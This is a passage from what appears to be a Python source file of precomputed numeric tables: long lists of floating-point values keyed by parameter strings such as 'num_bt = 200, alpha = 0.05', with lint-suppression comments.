0.8649373474121068, 0.8659970092773411, 0.8670570983886692, 0.8681175537109348, 0.8691784362792941, 0.8702396850585908, 0.8713013610839814, 0.8723634643554657, 0.8734259948730438, 0.8744889526367157, 0.8755523376464812, 0.8766161499023407, 0.8776803894042938, 0.8787450561523408, 0.8798102111816376, 0.8808758544921845, 0.8819419250488251, 0.8830084838867157, 0.8840754699707, 0.8851430053710906, 0.8862109680175748, 0.8872794799804654, 0.8883484802246059, 0.8894179687499965, 0.8904880065917932, 0.89155853271484, 0.8926296081542929, 0.8937012329101522, 0.8947733459472614, 0.8958460693359331, 0.8969194030761675, 0.8979932250976518, 0.8990676574706985, 0.9001427001953078, 0.9012183532714797, 0.9022945556640579, 0.9033714294433547, 0.9044489135742141, 0.9055270690917921, 0.9066058349609326, 0.9076853332519482, 0.9087654418945262, 0.9098462829589792, 0.910927795410151, 0.9120100402831978, 0.9130929565429634, 0.9141766662597602, 0.9152611694335884, 0.9163464050292917, 0.9174323730468698, 0.9185191955566353, 0.9196068725585883, 0.9206953430175725, 0.9217846679687444, 0.9228748474121037, 0.9239659423828069, 0.9250579528808539, 0.9261508789062446, 0.927244720458979, 0.9283395996093696, 0.9294354553222602, 0.9305323486328071, 0.9316302795410102, 0.9327292480468697, 0.933829376220698, 0.9349306030273384, 0.9360329895019478, 0.9371365966796822, 0.9382414245605416, 0.9393475341796821, 0.9404549255371039, 0.9415635986328069, 0.9426737365722601, 0.943785278320307, 0.9448982849121038, 0.946012817382807, 0.9471288757324162, 0.9482465820312442, 0.9493659973144474, 0.9504871215820254, 0.9516100769042911, 0.9527348632812441, 0.9538616638183534, 0.954990478515619, 0.9561213684081972, 0.9572545166015566, 0.958389923095697, 0.9595277709960878, 0.9606681213378846, 0.9618111572265564, 0.9629569396972596, 0.9641056518554628, 0.9652574768066347, 0.966412597656244, 0.9675711364746035, 0.9687333984374941, 0.9698995056152283, 0.9710698852539001, 0.9722447204589783, 0.9734243774414001, 
0.9746092224121033, 0.9757997436523377, 0.9769964294433534, 0.9781998901367127, 0.9794107360839782, 0.9806298217773376, 0.9818581237792906, 0.9830968017578062, 0.9843474426269468, 0.9856117553710874, 0.9868923034667906, 0.988192199707025, 0.9895158996581969, 0.9908700561523373, 0.9922647399902279, 0.9937177124023372, 0.9952649841308528, 0.9970087280273371], # skipcq: FLK-E501 'num_bt = 1000, alpha = 0.025': [2.5299072265625002e-05, 0.00024230957031250004, 0.0006191101074218749, 0.0010908813476562499, 0.0016253967285156249, 0.0022049560546874994, 0.002818878173828124, 0.0034599609374999984, 0.004123382568359373, 0.004805480957031248, 0.005503570556640623, 0.006215515136718748, 0.006939605712890622, 0.007674499511718747, 0.008419036865234372, 0.009172302246093746, 0.00993350219726562, 0.010701965332031247, 0.011477020263671874, 0.01225823974609375, 0.013045196533203126, 0.013837402343750003, 0.014634552001953127, 0.015436401367187505, 0.01624252319335938, 0.01705279541015626, 0.017866912841796888, 0.018684692382812514, 0.01950595092773439, 0.020330505371093766, 0.021158172607421893, 0.02198883056640627, 0.022822357177734398, 0.023658630371093774, 0.0244975280761719, 0.025338928222656272, 0.0261827087402344, 0.02702880859375003, 0.027877166748046904, 0.028727600097656278, 0.029580169677734407, 0.03043469238281253, 0.03129116821289066, 0.03214947509765629, 0.03300961303710941, 0.033871520996093786, 0.03473507690429691, 0.03560028076171879, 0.03646707153320316, 0.03733538818359378, 0.038205230712890656, 0.039076538085937536, 0.03994924926757815, 0.04082336425781253, 0.0416988220214844, 0.04257556152343753, 0.0434535827636719, 0.04433288574218753, 0.04521334838867191, 0.046095031738281285, 0.04697787475585941, 0.04786187744140629, 0.048746917724609415, 0.04963311767578129, 0.05052029418945316, 0.051408569335937536, 0.052297821044921915, 0.05318811035156253, 0.05407931518554691, 0.054971496582031286, 0.055864654541015656, 0.05675866699218753, 0.057653594970703166, 
0.05854943847656254, 0.05944613647460942, 0.06034368896484379, 0.06124203491210941, 0.06214123535156253, 0.06304122924804689, 0.06394195556640625, 0.06484353637695311, 0.06574584960937499, 0.06664895629882814, 0.067552734375, 0.06845730590820315, 0.06936254882812501, 0.07026846313476565, 0.07117510986328127, 0.0720824890136719, 0.07299047851562504, 0.07389913940429693, 0.07480847167968757, 0.0757184143066407, 0.07662896728515634, 0.0775401916503907, 0.07845202636718757, 0.07936447143554692, 0.0802775268554688, 0.08119113159179692, 0.08210534667968755, 0.08302011108398444, 0.08393548583984381, 0.08485134887695317, 0.08576782226562504, 0.08668484497070317, 0.08760235595703128, 0.08852041625976564, 0.08943902587890629, 0.09035812377929692, 0.0912777709960938, 0.09219790649414067, 0.09311853027343756, 0.09403964233398443, 0.09496130371093756, 0.09588339233398444, 0.0968059692382813, 0.09772897338867192, 0.0986525268554688, 0.09957650756835942, 0.1005009155273438, 0.10142581176757817, 0.1023511352539063, 0.10327688598632817, 0.10420312500000006, 0.10512979125976571, 0.10605682373046885, 0.10698434448242197, 0.10791223144531262, 0.10884054565429699, 0.10976928710937511, 0.11069845581054699, 0.11162799072265636, 0.11255795288085949, 0.11348828125000013, 0.1144190368652345, 0.11535015869140638, 0.11628170776367203, 0.1172135620117189, 0.11814584350585955, 0.11907849121093769, 0.12001150512695333, 0.12094488525390645, 0.1218786315917971, 0.12281274414062524, 0.12374722290039086, 0.12468206787109398, 0.1256172180175784, 0.1265527343750003, 0.12748861694335972, 0.12842480468750034, 0.12936135864257847, 0.13029827880859407, 0.13123544311523466, 0.13217303466796904, 0.13311093139648467, 0.13404913330078155, 0.1349876403808597, 0.1359265136718753, 0.13686569213867217, 0.1378051757812503, 0.13874496459960967, 0.1396851196289065, 0.1406255187988284, 0.1415662841796878, 0.1425072937011722, 0.14344866943359408, 0.14439028930664094, 0.14533227539062532, 0.1462745056152347, 
0.14721704101562533, 0.14815982055664095, 0.1491029663085941, 0.15004635620117224, 0.15099005126953163, 0.15193405151367223, 0.15287829589843788, 0.15382284545898478, 0.15476763916015668, 0.15571273803710983, 0.15665808105468798, 0.1576037292480474, 0.158549682617188, 0.1594958190917974, 0.16044226074218804, 0.16138900756835994, 0.16233599853515684, 0.16328323364257874, 0.16423071289062563, 0.16517849731445378, 0.16612652587890692, 0.16707479858398505, 0.16802331542968818, 0.1689720764160163, 0.16992114257812568, 0.17087045288086006, 0.17181994628906322, 0.17276974487304764, 0.17371978759765705, 0.17467007446289146, 0.1756205444335946, 0.176571319580079, 0.17752233886718838, 0.17847360229492276, 0.17942504882812588, 0.180376739501954, 0.18132873535156335, 0.18228091430664145, 0.1832333374023446, 0.18418594360351648, 0.1851388549804696, 0.18609194946289148, 0.18704528808593834, 0.1879988708496102, 0.1889526367187508, 0.18990664672851643, 0.19086090087890706, 0.19181533813476648, 0.1927700195312509, 0.1937249450683603, 0.19468005371093844, 0.1956353454589853, 0.19659094238281344, 0.1975467224121103, 0.19850268554687595, 0.1994588928222666, 0.20041528320312602, 0.20137191772461044, 0.2023287353515636, 0.20328579711914174, 0.20424304199218862, 0.20520046997070424, 0.20615814208984484, 0.20711599731445424, 0.20807409667968862, 0.2090323791503918, 0.2099908447265637, 0.21094949340820435, 0.21190838623046998, 0.2128674621582044, 0.21382678222656382, 0.21478628540039196, 0.21574591064453258, 0.21670584106445445, 0.21766589355468885, 0.21862612915039198, 0.2195866088867201, 0.22054727172851696, 0.2215081176757826, 0.22246914672851698, 0.2234304199218764, 0.2243918151855483, 0.22535345458984518, 0.2263152770996108, 0.22727722167968895, 0.22823941040039208, 0.22920178222656395, 0.23016433715820456, 0.23112707519531395, 0.23208999633789207, 0.23305310058593892, 0.2340163879394545, 0.23497985839843888, 0.23594351196289198, 0.23690734863281387, 0.2378713684082045, 
0.2388355712890639, 0.23979995727539205, 0.24076452636718892, 0.24172921752929832, 0.24269415283203272, 0.24365921020507958, 0.24462451171875144, 0.24558993530273582, 0.24655554199218893, 0.24752133178711083, 0.24848730468750146, 0.24945346069336088, 0.2504197387695327, 0.25138626098632966, 0.252352905273439, 0.25331973266601715, 0.2542866821289078, 0.2552538757324234, 0.25622119140625155, 0.25718869018554846, 0.25815637207031406, 0.25912417602539217, 0.26009222412109523, 0.2610603942871108, 0.2620286865234389, 0.26299722290039207, 0.26396588134765775, 0.2649347229003921, 0.265903686523439, 0.2668728942871109, 0.2678422241210954, 0.26881167602539235, 0.269781311035158, 0.27075112915039246, 0.2717211303710956, 0.2726912536621112, 0.27366156005859565, 0.2746319885253926, 0.27560260009765825, 0.27657339477539267, 0.2775443115234396, 0.27851541137695524, 0.2794866333007834, 0.2804580383300803, 0.28142956542968967, 0.2824012756347678, 0.2833731689453147, 0.28434518432617406, 0.2853173828125022, 0.28628970336914283, 0.28726220703125216, 0.288234832763674, 0.28920764160156465, 0.29018063354492396, 0.29115368652343954, 0.29212698364258016, 0.2931004028320332, 0.29407394409179877, 0.2950476684570331, 0.29602151489258, 0.29699554443359555, 0.2979696960449236, 0.2989440307617205, 0.2999184875488299, 0.3008930664062518, 0.3018678283691424, 0.30284277343750177, 0.3038177795410174, 0.3047930297851581, 0.30576834106445505, 0.3067438354492207, 0.3077195129394551, 0.30869531250000204, 0.3096712341308614, 0.31064733886718954, 0.3116235656738302, 0.3125999145507833, 0.31357644653320516, 0.31455310058593955, 0.3155299377441426, 0.3165068969726582, 0.31748397827148633, 0.31846124267578324, 0.3194385681152363, 0.3204161376953144, 0.3213937683105488, 0.3223715820312518, 0.32334957885742366, 0.32432763671875176, 0.32530587768554864, 0.32628424072265805, 0.32726278686523613, 0.32824145507812674, 0.3292202453613299, 0.33019915771484554, 0.33117825317383, 0.33215747070312696, 
0.33313681030273634, 0.3341163330078145, 0.3350959777832052, 0.3360757446289083, 0.33705563354492396, 0.3380357055664084, 0.33901589965820533, 0.3399962158203147, 0.34097671508789285, 0.34195727539062726, 0.34293801879883035, 0.34391888427734596, 0.34489993286133036, 0.345881042480471, 0.34686233520508036, 0.3478437500000022, 0.3488253479003929, 0.3498070068359398, 0.3507888488769554, 0.3517708129882835, 0.35275289916992414, 0.3537351074218773, 0.35471749877929926, 0.3557000122070336, 0.3566826477050805, 0.35766540527343993, 0.35864828491211187, 0.3596313476562526, 0.36061453247070574, 0.3615978393554714, 0.3625812683105496, 0.3635648193359403, 0.36454849243164344, 0.36553234863281536, 0.3665163269042998, 0.3675004272460968, 0.36848464965820615, 0.36946899414062806, 0.3704534606933625, 0.3714381103515656, 0.37242288208008123, 0.3734077148437531, 0.3743927307128938, 0.37537792968750316, 0.3763631896972688, 0.37734857177734693, 0.37833413696289386, 0.37931976318359695, 0.3803055725097688, 0.3812915039062532, 0.38227755737305014, 0.3832637329101596, 0.3842500915527377, 0.3852365112304721, 0.38622311401367526, 0.3872097778320347, 0.3881966247558629, 0.38918359375000366, 0.3901706848144568, 0.3911578979492225, 0.3921452331543007, 0.39313269042969146, 0.39412033081055087, 0.39510803222656654, 0.396095916748051, 0.397083923339848, 0.3980719909668011, 0.39906024169922305, 0.4000486145019575, 0.4010371093750045, 0.40202572631836386, 0.4030144653320358, 0.4040033874511765, 0.40499237060547344, 0.4059815368652391, 0.406970764160161, 0.40796017456055167, 0.4089496459960986, 0.40993930053711425, 0.4109290771484424, 0.4119189758300831, 0.41290899658203617, 0.4138991394043018, 0.4148894042968799, 0.4158797912597706, 0.4168703002929737, 0.4178609313964893, 0.4188516845703174, 0.4198426208496143, 0.4208336181640674, 0.42182479858398925, 0.42281604003906736, 0.42380746459961427, 0.4247989501953173, 0.42579061889648917, 0.42678240966797354, 0.42777432250977043, 0.4287662963867236, 
0.42975845336914553, 0.4307507324218799, 0.43174313354492677, 0.4327356567382862, 0.4337283020019581, 0.43472106933594257, 0.43571395874023955, 0.43670697021484894, 0.4377001647949271, 0.43869342041016157, 0.43968679809570854, 0.4406802978515679, 0.4416739807128961, 0.44266772460938053, 0.44366165161133364, 0.444655639648443, 0.4456498107910212, 0.4466440429687556, 0.4476384582519587, 0.44863293457031805, 0.4496275939941462, 0.4506223144531306, 0.4516172180175837, 0.4526122436523493, 0.4536073303222712, 0.45460260009766185, 0.4555979919433649, 0.4565935058593805, 0.45758914184570865, 0.4585848999023493, 0.4595807189941462, 0.4605767211914118, 0.4615728454589899, 0.46256909179688055, 0.4635654602050836, 0.4645619506835992, 0.4655585632324273, 0.4665552978515679, 0.4675522155761772, 0.4685491943359428, 0.46954629516602087, 0.4705435180664115, 0.4715408630371145, 0.47253833007813006, 0.4735359802246144, 0.474533691406255, 0.47553152465820814, 0.47652954101563005, 0.4775276184082081, 0.4785258178710987, 0.4795242004394581, 0.48052264404297373, 0.48152127075195816, 0.48251995849609886, 0.4835188293457082, 0.48451776123047385, 0.48551687622070827, 0.4865161132812552, 0.4875154113769583, 0.4885148925781302, 0.4895144958496146, 0.49051416015625526, 0.4915140075683646, 0.4925139770507865, 0.4935140686035209, 0.4945142822265678, 0.49551455688477086, 0.4965150146484427, 0.4975155944824271, 0.498516296386724, 0.49951712036133333, 0.5005180664062553, 0.5015191955566459, 0.5025203857421928, 0.5035216979980522, 0.5045231323242241, 0.5055246887207084, 0.5065264282226615, 0.5075282287597708, 0.5085302124023489, 0.5095322570800832, 0.5105344238281301, 0.5115367736816457, 0.5125392456054738, 0.5135417785644582, 0.5145444946289112, 0.5155473327636767, 0.5165502319335985, 0.5175533142089891, 0.5185565185546922, 0.5195598449707078, 0.520563293457036, 0.5215668640136767, 0.5225705566406299, 0.5235744323730518, 0.5245783691406299, 0.5255824279785205, 0.5265866699218799, 
0.5275909729003955, 0.5285954589843799, 0.5296000061035205, 0.53060473632813, 0.531609588623052, 0.5326145019531302, 0.5336195983886772, 0.5346248168945368, 0.5356301574707087, 0.536635620117193, 0.5376412658691462, 0.5386469726562556, 0.5396528015136776, 0.5406588134765683, 0.5416648864746153, 0.5426711425781311, 0.5436775207519593, 0.5446839599609435, 0.5456905822753967, 0.5466973266601624, 0.5477042541503968, 0.5487112426757875, 0.5497183532714908, 0.5507256469726627, 0.5517330017089908, 0.5527405395507875, 0.5537481994628969, 0.5547559204101625, 0.555763824462897, 0.5567719116211002, 0.5577800598144597, 0.5587883300781316, 0.559796783447272, 0.5608052978515689, 0.5618139953613345, 0.5628228149414126, 0.5638317565918033, 0.5648408203125065, 0.5658500671386784, 0.5668593750000064, 0.5678688659668031, 0.5688784179687562, 0.569888153076178, 0.5708980102539124, 0.5719080505371156, 0.572918151855475, 0.5739284362793031, 0.5749387817382873, 0.5759493103027403, 0.5769599609375059, 0.5779707946777403, 0.5789816894531309, 0.5799927673339903, 0.581003906250006, 0.5820152282714902, 0.583026672363287, 0.5840382995605525, 0.5850499877929743, 0.586061859130865, 0.5870738525390681, 0.5880859680175837, 0.5890982055664118, 0.5901106262207086, 0.5911231689453179, 0.5921358337402397, 0.593148620605474, 0.5941615905761771, 0.5951746215820365, 0.5961878356933645, 0.5972011718750051, 0.5982146911621143, 0.5992282714843798, 0.6002420349121141, 0.601255920410161, 0.6022699890136766, 0.6032841186523483, 0.6042984313964889, 0.6053128662109418, 0.6063274841308636, 0.6073422241210978, 0.6083570861816446, 0.609372070312504, 0.6103872375488321, 0.6114024658203164, 0.6124179382324259, 0.6134334716796915, 0.6144491882324258, 0.6154650268554726, 0.6164809875488318, 0.6174971313476599, 0.6185133972168005, 0.6195297851562537, 0.6205463562011756, 0.62156304931641, 0.622579864501957, 0.6235968627929728, 0.624613983154301, 0.6256312866210977, 0.6266486511230508, 0.627666259765629, 
0.6286839294433634, 0.6297017822265666, 0.6307197570800823, 0.6317379150390666, 0.6327561950683634, 0.6337745971679728, 0.6347931823730509, 0.6358118896484416, 0.636830780029301, 0.6378497924804729, 0.6388689880371136, 0.6398882446289104, 0.6409077453613322, 0.6419273681640666, 0.6429471130371135, 0.6439670410156292, 0.6449870910644573, 0.6460072631835979, 0.6470276184082072, 0.6480481567382853, 0.6490688171386759, 0.6500895996093791, 0.6511105651855509, 0.6521317138671915, 0.6531529846191445, 0.65417437744141, 0.6551959533691444, 0.6562177124023475, 0.6572395935058631, 0.6582615966796912, 0.6592838439941443, 0.6603061523437536, 0.6613287048339879, 0.6623513183593784, 0.6633741760253941, 0.6643971557617221, 0.6654202575683626, 0.6664435424804719, 0.6674670104980499, 0.6684906005859405, 0.6695143737792998, 0.6705383300781278, 0.6715624084472683, 0.6725866699218775, 0.6736110534667993, 0.6746356201171898, 0.6756603698730491, 0.6766853027343771, 0.6777103576660176, 0.6787355957031268, 0.6797609558105485, 0.680786499023439, 0.6818122253417983, 0.6828381347656263, 0.6838641662597668, 0.6848903808593759, 0.6859167785644539, 0.6869432983398444, 0.6879700622558599, 0.6889969482421879, 0.6900239562988285, 0.6910512084960941, 0.6920785827636722, 0.6931062011718753, 0.6941339416503908, 0.6951618652343751, 0.6961899108886719, 0.6972182006835937, 0.6982466125488281, 0.6992752075195313, 0.7003039855957032, 0.7013329467773438, 0.7023620910644531, 0.7033914184570312, 0.7044208679199219, 0.7054505615234375, 0.7064804382324218, 0.7075104370117186, 0.7085406188964841, 0.7095710449218747, 0.7106015930175779, 0.7116323242187497, 0.7126632995605465, 0.7136943969726558, 0.7147256774902339, 0.7157571411132807, 0.7167888488769525, 0.7178206787109368, 0.718852752685546, 0.7198849487304678, 0.7209173889160146, 0.7219500122070303, 0.7229828186035144, 0.7240158081054674, 0.7250489807128891, 0.7260823364257797, 0.727115875244139, 0.7281496582031232, 0.7291836242675761, 0.7302177734374978, 
0.7312521057128883, 0.7322866210937476, 0.733321380615232, 0.7343563232421851, 0.735391448974607, 0.7364268188476538, 0.7374623107910131, 0.7384980468749974, 0.7395340270996068, 0.740570190429685, 0.7416065368652319, 0.7426430664062477, 0.7436798400878882, 0.7447167968749976, 0.745753997802732, 0.7467913818359352, 0.7478290100097633, 0.7488668212890602, 0.7499048156738258, 0.7509430541992165, 0.7519815368652322, 0.7530202026367164, 0.7540591125488257, 0.7550982055664038, 0.756137542724607, 0.7571770629882788, 0.7582168273925757, 0.7592568359374975, 0.7602970275878881, 0.7613374633789037, 0.7623781433105442, 0.7634190063476535, 0.7644601135253878, 0.7655014648437471, 0.7665430603027313, 0.7675848388671843, 0.7686269226074186, 0.7696691894531217, 0.7707117004394498, 0.7717543945312467, 0.7727973937988248, 0.773840637207028, 0.7748840637206998, 0.775927795410153, 0.7769717712402312, 0.7780159301757782, 0.7790603942871064, 0.7801050415039031, 0.7811499938964813, 0.7821951904296846, 0.7832406311035127, 0.7842863159179657, 0.7853322448730439, 0.7863784790039033, 0.7874248962402315, 0.7884716186523409, 0.7895186462402316, 0.790565856933591, 0.7916133728027316, 0.7926611328124972, 0.7937091979980441, 0.7947575073242159, 0.7958060607910128, 0.7968549194335909, 0.7979040832519503, 0.7989534912109345, 0.8000032043457, 0.8010531616210906, 0.8021033630371063, 0.8031539306640595, 0.8042047424316376, 0.8052558593749971, 0.8063072814941378, 0.8073589477539035, 0.8084109191894505, 0.8094631958007787, 0.8105157775878881, 0.8115686645507788, 0.8126218566894508, 0.8136753540039038, 0.8147291564941382, 0.815783264160154, 0.8168376770019509, 0.817892395019529, 0.8189474182128885, 0.8200028076171854, 0.8210585021972635, 0.822114501953123, 0.8231708679199198, 0.8242275390624979, 0.8252845153808573, 0.8263418579101541, 0.8273995666503885, 0.8284575805664042, 0.8295158996582009, 0.8305746459960915, 0.8316336975097633, 0.8326930541992165, 0.8337528381347633, 0.8348129882812475, 
0.835873443603513, 0.8369342651367161, 0.8379955139160128, 0.8390570678710908, 0.8401190490722626, 0.8411813964843721, 0.8422441101074188, 0.8433071899414032, 0.8443706970214814, 0.8454345703124971, 0.8464988098144502, 0.8475634765624972, 0.8486285705566378, 0.8496940917968722, 0.850759979248044, 0.8518262939453097, 0.8528930358886692, 0.8539602050781222, 0.8550277404785128, 0.8560957641601533, 0.8571642150878876, 0.8582331542968719, 0.8593024597167936, 0.8603722534179654, 0.8614425354003873, 0.8625132446289029, 0.8635844421386684, 0.8646560668945277, 0.8657282409667931, 0.8668008422851524, 0.8678739318847616, 0.8689475097656209, 0.8700216369628865, 0.871096252441402, 0.8721713562011676, 0.8732470092773394, 0.8743231506347614, 0.8753998413085895, 0.876477081298824, 0.8775548706054644, 0.878633148193355, 0.879712036132808, 0.8807915344238236, 0.8818715209960891, 0.8829521789550733, 0.8840333862304638, 0.8851151428222607, 0.8861975708007762, 0.8872806091308544, 0.888364257812495, 0.8894485168456981, 0.89053344726562, 0.8916189880371043, 0.8927052612304637, 0.8937921447753855, 0.8948797607421822, 0.8959679870605416, 0.8970570068359321, 0.8981466979980416, 0.899237121582026, 0.9003282775878855, 0.9014202270507762, 0.9025129089355418, 0.9036063842773386, 0.9047005920410105, 0.90579565429687, 0.9068915710449169, 0.907988281249995, 0.9090858459472607, 0.9101842651367139, 0.9112835388183546, 0.9123837890624952, 0.9134848937988234, 0.9145869750976514, 0.9156899719238232, 0.9167939453124949, 0.917898956298823, 0.9190049438476511, 0.9201119689941354, 0.9212200317382758, 0.9223292541503852, 0.9234395141601509, 0.9245509338378853, 0.9256635131835885, 0.9267772521972604, 0.9278922729492135, 0.9290085144042916, 0.9301259765624946, 0.9312448425292913, 0.9323649902343693, 0.933486541748041, 0.9346094970703066, 0.9357339172363223, 0.936859863281244, 0.9379873962402282, 0.9391164550781187, 0.940247161865228, 0.9413795776367123, 0.942513763427728, 0.9436497192382748, 
0.9447875671386655, 0.9459273071288999, 0.9470690612792906, 0.9482128906249937, 0.9493588562011657, 0.9505070800781187, 0.9516576232910093, 0.9528105468749936, 0.9539660339355404, 0.9551240844726497, 0.9562849426269465, 0.9574486083984307, 0.9586152648925711, 0.9597850952148367, 0.960958282470696, 0.9621348876953054, 0.9633151550292897, 0.9644993896484303, 0.9656876525878834, 0.9668803100585867, 0.968077667236321, 0.9692799682617116, 0.9704875793456958, 0.9717009887695238, 0.9729205017089769, 0.9741467285156175, 0.9753802795410081, 0.9766218261718677, 0.9778722229003832, 0.9791323242187425, 0.9804033508300707, 0.9816867675781177, 0.982984222412102, 0.9842979736328051, 0.9856308288574146, 0.9869865722656176, 0.9883705139160083, 0.989790344238274, 0.9912579650878833, 0.9927941894531177, 0.9944410705566334, 0.996317932128899], # skipcq: FLK-E501 'num_bt = 200, alpha = 0.1': [0.0005266952514648437, 0.0026622009277343754, 0.005522804260253907, 0.008751449584960939, 0.012211112976074221, 0.015833129882812498, 0.01957775115966797, 0.023419113159179696, 0.02733966827392579, 0.031326751708984385, 0.03537067413330079, 0.03946403503417971, 0.04360103607177738, 0.047776947021484405, 0.05198780059814457, 0.05623039245605472, 0.060501899719238306, 0.06480010986328127, 0.06912288665771488, 0.07346855163574223, 0.07783550262451176, 0.08222236633300783, 0.08662792205810552, 0.09105125427246098, 0.09549121856689458, 0.09994697570800787, 0.10441783905029303, 0.10890296936035163, 0.11340183258056649, 0.11791374206542979, 0.12243816375732434, 0.12697463989257826, 0.13152271270751967, 0.1360819244384767, 0.14065181732177745, 0.14523216247558604, 0.14982250213623055, 0.15442260742187514, 0.15903209686279313, 0.1636506652832033, 0.168278160095215, 0.17291435241699235, 0.17755886077880872, 0.18221160888671892, 0.1868722915649416, 0.19154083251953144, 0.19621692657470724, 0.20090049743652366, 0.20559139251709008, 0.21028930664062526, 0.21499423980712914, 0.2197060394287112, 
0.2244245529174807, 0.2291496276855471, 0.23388118743896508, 0.2386191558837893, 0.24336330413818386, 0.2481136322021487, 0.2528699874877932, 0.25763236999511746, 0.26240062713623075, 0.26717460632324247, 0.27195438385009796, 0.27673973083496123, 0.2815306472778324, 0.2863271331787113, 0.2911289596557621, 0.2959362792968754, 0.30074878692626994, 0.30556663513183635, 0.31038967132568407, 0.3152178192138677, 0.32005115509033255, 0.32488945007324277, 0.3297328567504889, 0.33458114624023505, 0.33943439483642646, 0.3442926025390632, 0.34915561676025453, 0.35402343750000065, 0.35889614105224676, 0.36377349853515695, 0.36865566253662174, 0.37354255676269593, 0.37843410491943424, 0.38333030700683657, 0.3882311630249029, 0.39313659667968803, 0.39804668426513723, 0.40296134948730516, 0.4078805923461919, 0.41280441284179736, 0.4177328109741217, 0.42266563415527403, 0.4276031112670905, 0.4325450134277351, 0.4374914169311531, 0.4424423980712899, 0.44739788055420004, 0.45235778808593835, 0.45732227325439534, 0.4622911834716805, 0.46726467132568444, 0.47224258422851645, 0.4772250747680672, 0.48221199035644613, 0.48720348358154386, 0.492199478149415, 0.49720005035400483, 0.5022051239013681, 0.5072147750854501, 0.5122290039062509, 0.5172478103637705, 0.5222712707519543, 0.5272993087768567, 0.5323320007324233, 0.5373693466186538, 0.5424113464355484, 0.5474580764770525, 0.5525096130371112, 0.5575658798217793, 0.5626268768310567, 0.567692756652834, 0.5727635192871114, 0.5778391647338887, 0.5829196929931661, 0.5880052566528342, 0.5930957794189475, 0.5981914138793967, 0.6032921600341818, 0.6083980178833028, 0.6135090637207052, 0.6186254501342794, 0.6237471008300801, 0.6288740921020528, 0.634006576538088, 0.6391444778442403, 0.6442880249023457, 0.6494372177124044, 0.6545920562744161, 0.6597527694702168, 0.6649192810058613, 0.6700918197631853, 0.6752703857421893, 0.6804551315307634, 0.6856461334228532, 0.690843467712404, 0.6960472869873062, 0.7012576675415054, 0.7064747619628922, 
0.711698722839357, 0.7169297027587906, 0.7221677780151383, 0.7274131011962908, 0.7326659011840839, 0.7379263305664081, 0.7431945419311543, 0.7484706878662131, 0.7537550735473655, 0.7590478515625023, 0.7643492507934593, 0.7696595764160179, 0.7749789810180687, 0.7803078460693382, 0.7856464004516623, 0.7909950256347678, 0.7963540267944358, 0.8017237854003927, 0.80710460662842, 0.8124971008300801, 0.8179015731811543, 0.823318634033205, 0.8287487411499042, 0.8341925048828143, 0.8396506118774432, 0.845123825073244, 0.8506128311157246, 0.8561184692382833, 0.8616418838500997, 0.8671839904785177, 0.8727460861206076, 0.8783294677734395, 0.8839356613159199, 0.8895665740966816, 0.8952240371704121, 0.9009105682373066, 0.9066288375854512, 0.9123821258544944, 0.9181743240356468, 0.9240102386474631, 0.9298956680297872, 0.9358380889892599, 0.9418471908569359, 0.9479356384277366, 0.9541212844848657, 0.9604301452636743, 0.9669025039672876, 0.9736086273193385, 0.9806913375854518, 0.9885530853271509], # skipcq: FLK-E501 'num_bt = 200, alpha = 0.05': [0.00025646209716796877, 0.0017797088623046878, 0.004100608825683594, 0.0068597412109375, 0.009901237487792966, 0.013143997192382809, 0.016539649963378908, 0.0200567626953125, 0.023673591613769536, 0.027374267578125014, 0.031146888732910168, 0.03498214721679687, 0.03887271881103515, 0.04281265258789061, 0.046796989440917945, 0.0508216857910156, 0.054883308410644496, 0.05897872924804685, 0.06310550689697261, 0.06726142883300776, 0.07144443511962884, 0.0756529235839843, 0.07988521575927726, 0.08414009094238271, 0.08841632843017569, 0.09271270751953116, 0.09702823638916008, 0.101362075805664, 0.10571338653564448, 0.11008140563964841, 0.11446544647216796, 0.11886489868164063, 0.1232790756225586, 0.12770744323730468, 0.13214962005615233, 0.13660499572753904, 0.14107326507568357, 0.14555389404296878, 0.15004657745361333, 0.154551010131836, 0.15906673431396487, 0.16359352111816405, 0.16813098907470705, 0.17267898559570313, 0.1772372055053711, 
0.1818053436279297, 0.18638324737548825, 0.19097068786621088, 0.19556743621826167, 0.20017326354980466, 0.2047880172729492, 0.20941154479980467, 0.21404361724853516, 0.2186841583251953, 0.2233330154418945, 0.22798995971679686, 0.23265491485595705, 0.23732772827148438, 0.2420083236694336, 0.24669654846191408, 0.25139225006103516, 0.25609542846679695, 0.2608059310913086, 0.26552360534667974, 0.2702483749389649, 0.27498023986816417, 0.27971904754638677, 0.28446472167968756, 0.28921718597412116, 0.29397636413574224, 0.29874225616455086, 0.30351470947265635, 0.3082937240600586, 0.3130792236328125, 0.3178710556030273, 0.3226693725585936, 0.3274739456176757, 0.3322847747802734, 0.33710178375244143, 0.341925048828125, 0.3467544174194337, 0.3515898895263674, 0.356431465148926, 0.3612790679931643, 0.36613262176513695, 0.37099212646484403, 0.37585765838623075, 0.3807290649414065, 0.38560634613037126, 0.3904895782470705, 0.3953786087036135, 0.4002734375000002, 0.40517414093017595, 0.4100806427001955, 0.4149929428100588, 0.41991104125976586, 0.42483486175537133, 0.4297644805908206, 0.4346998977661136, 0.43964103698730506, 0.44458789825439493, 0.4495405578613286, 0.45449901580810603, 0.4594631958007818, 0.4644331741333013, 0.4694088745117193, 0.4743904495239264, 0.4793777465820319, 0.48437084197998115, 0.4893698120117194, 0.4943745803833015, 0.49938522338867264, 0.5044017410278328, 0.5094241333007821, 0.5144524765014657, 0.5194866943359384, 0.5245269393920908, 0.5295732116699228, 0.5346254348754893, 0.5396837615966807, 0.5447482681274425, 0.549818801879884, 0.5548955917358409, 0.5599785614013684, 0.5650677871704115, 0.5701633453369155, 0.5752653121948257, 0.5803736877441421, 0.5854884719848648, 0.5906098937988296, 0.595737800598146, 0.6008724212646499, 0.6060138320922865, 0.6111619567871107, 0.6163170242309584, 0.6214789581298841, 0.626647987365724, 0.6318241882324231, 0.6370075607299817, 0.6421982574462901, 0.6473963546752941, 0.652602005004884, 0.6578152847290049, 
